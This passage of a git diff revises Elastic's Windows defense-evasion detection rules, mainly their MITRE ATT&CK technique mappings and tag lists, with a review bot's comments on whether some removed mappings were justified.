"2026/03/23" [rule] author = ["Elastic"] 
@@ -108,6 +108,7 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -117,20 +118,13 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" -[[rule.threat.technique.subtechnique]] -id = "T1562.006" -name = "Indicator Blocking" -reference = "https://attack.mitre.org/techniques/T1562/006/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml b/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml index 0666acac376..bfa1d4320b9 100644 --- a/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml +++ b/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/20" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -108,41 +108,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" -[[rule.threat.technique.subtechnique]] -id = "T1562.006" -name = "Indicator Blocking" -reference = "https://attack.mitre.org/techniques/T1562/006/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_disabling_windows_logs.toml b/rules/windows/defense_evasion_disabling_windows_logs.toml index 8a2c924a761..918d32f3d95 100644 --- a/rules/windows/defense_evasion_disabling_windows_logs.toml +++ b/rules/windows/defense_evasion_disabling_windows_logs.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/06" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Ivan Ninichuck", "Austin Songer"] 
@@ -103,34 +103,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" -[[rule.threat.technique.subtechnique]] -id = "T1070.001" -name = "Clear Windows Event Logs" -reference = "https://attack.mitre.org/techniques/T1070/001/" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" -[[rule.threat.technique.subtechnique]] -id = "T1562.006" -name = "Indicator Blocking" -reference = "https://attack.mitre.org/techniques/T1562/006/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml index e6b5d148708..4d1b9d2f617 100644 --- a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml +++ b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -63,21 +63,7 @@ note = """## Triage and analysis risk_score = 47 rule_id = "201200f1-a99b-43fb-88ed-f65a45c4972c" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -90,36 +76,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.004" name = "Compile After Delivery" reference = "https://attack.mitre.org/techniques/T1027/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - 
diff --git a/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml b/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml index f5b76cd15e6..36fa31a2960 100644 --- a/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml +++ b/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml @@ -2,7 +2,7 @@ creation_date = "2021/09/08" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,21 +64,7 @@ references = ["https://www.joesandbox.com/analysis/476188/1/html"] risk_score = 73 rule_id = "416697ae-e468-4093-a93d-59661fa619ec" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -100,19 +86,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.002" name = "Control Panel" reference = "https://attack.mitre.org/techniques/T1218/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml index 2cc57b1fcb1..59086cf0516 100644 --- a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml +++ b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -106,21 +106,7 @@ references = ["https://dtm.uk/wuauclt/"] risk_score = 47 rule_id = "edf8ee23-5ea7-4123-ba19-56b41e424ae3" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" @@ -138,14 +124,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml index 93810f62173..15868ad4ecf 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,21 +85,7 @@ references = ["https://blog.talosintelligence.com/2020/02/building-bypass-with-m risk_score = 73 rule_id = "c5dc3223-13a2-44a2-946c-e9dc0aa0449c" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -119,26 +105,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - 
diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml index 078583b84ea..34687a32d2b 100755 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,16 +54,7 @@ The Microsoft Build Engine (MSBuild) is a platform for building applications, ty risk_score = 47 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" 
@@ -87,49 +78,21 @@ host.os.type:windows and event.category:process and event.type:start and ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml index c2e91fd6574..6992af6d0a0 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,21 +64,7 @@ The Microsoft Build Engine (MSBuild) is a platform for building applications, ty risk_score = 47 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -91,26 +77,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - 
diff --git a/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml b/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml index 084e10613d6..75f254895c1 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -102,19 +102,7 @@ This rule checks for renamed instances of MSBuild, which can indicate an attempt risk_score = 21 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" 
@@ -127,29 +115,28 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml index ba363f8f52b..2f5cda9c602 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -66,17 +66,7 @@ references = ["https://blog.talosintelligence.com/2020/02/building-bypass-with-m risk_score = 21 rule_id = "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -88,32 +78,31 @@ process.name:("csc.exe" or "iexplore.exe" or "powershell.exe") [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.004" name = "Compile After Delivery" reference = "https://attack.mitre.org/techniques/T1027/004/" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml b/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml index 4b5e879dc86..d817fd8d7cf 100644 --- a/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml +++ b/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows", "m365_defender", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,20 +62,7 @@ DLL side-loading exploits the DLL search order to load malicious code into trust risk_score = 47 rule_id = "1160dcdb-0a0a-4a79-91d8-9b84616edebd" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide", "Data Source: Crowdstrike", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "eql" @@ -123,24 +110,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
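Review bot: The threat hunk removes `T1036` (Masquerading) entirely, leaving only T1574.001, and nothing in the hunk explains why the Masquerading mapping was wrong. The hunk-header context describes this rule as DLL side-loading into trusted processes, so T1574.001 is clearly primary, but if the query (outside the hunk) also keys on renamed or relocated binaries the T1036 entry was carrying real meaning. Either restore the `[[rule.threat.technique]]` / `id = "T1036"` block or record the rationale in the rule description so the next ATT&CK sync does not re-add it. The enclosing `[[rule.threat]]` table starts inside the hunk and is complete here.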
diff --git a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml index e1eaae3f8de..98338405475 100644 --- a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml +++ b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/07" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Dennis Perto"] @@ -63,19 +63,7 @@ references = [ risk_score = 73 rule_id = "053a0387-f3b5-4ba5-8245-8002cca2bd08" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -106,19 +94,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_file_creation_mult_extension.toml b/rules/windows/defense_evasion_file_creation_mult_extension.toml index 8725775f18e..d0b71e826a1 100644 --- a/rules/windows/defense_evasion_file_creation_mult_extension.toml +++ b/rules/windows/defense_evasion_file_creation_mult_extension.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
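Review bot: Replacing T1574.001 (DLL side-loading) with T1036.003/T1036.005 in the Windows Defender unusual-path rule drops the technique most associated with this tradecraft — moving a Defender binary to a writable path is usually done so a malicious DLL can be side-loaded beside it, with the relocation being the means rather than the goal. Masquerading is a fair addition, but consider keeping both `[[rule.threat.technique]]` entries (T1036 with its sub-techniques and T1574 with T1574.001) rather than swapping one for the other. The query is outside this hunk, so I cannot confirm which behaviour it actually keys on; if it only checks path, the swap is defensible and a sentence in the description should say so.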
@@ -98,36 +98,18 @@ file where host.os.type == "windows" and event.type == "creation" and file.exten [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.007" name = "Double File Extension" reference = "https://attack.mitre.org/techniques/T1036/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml index 628a39d0949..b546108d92b 100644 --- a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml +++ b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
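Review bot: This hunk deletes the whole Execution `[[rule.threat]]` (T1204.002), but the diff for this file contains no `tags` hunk, so if `tags` still lists `Tactic: Execution` it is now an orphan tag that the tightened tag/tactic consistency check will reject. The tags block is outside the hunk, so please confirm. On the mapping itself, a double-extension file is the lure and user execution is what follows, so dropping T1204.002 is defensible — but it is a content change, not a tag cleanup, and deserves a line in the PR description.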
@@ -85,19 +85,18 @@ registry where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_iis_httplogging_disabled.toml b/rules/windows/defense_evasion_iis_httplogging_disabled.toml index 1f7de5422de..9a117a755ba 100644 --- a/rules/windows/defense_evasion_iis_httplogging_disabled.toml +++ b/rules/windows/defense_evasion_iis_httplogging_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,19 +89,13 @@ process where host.os.type == "windows" and 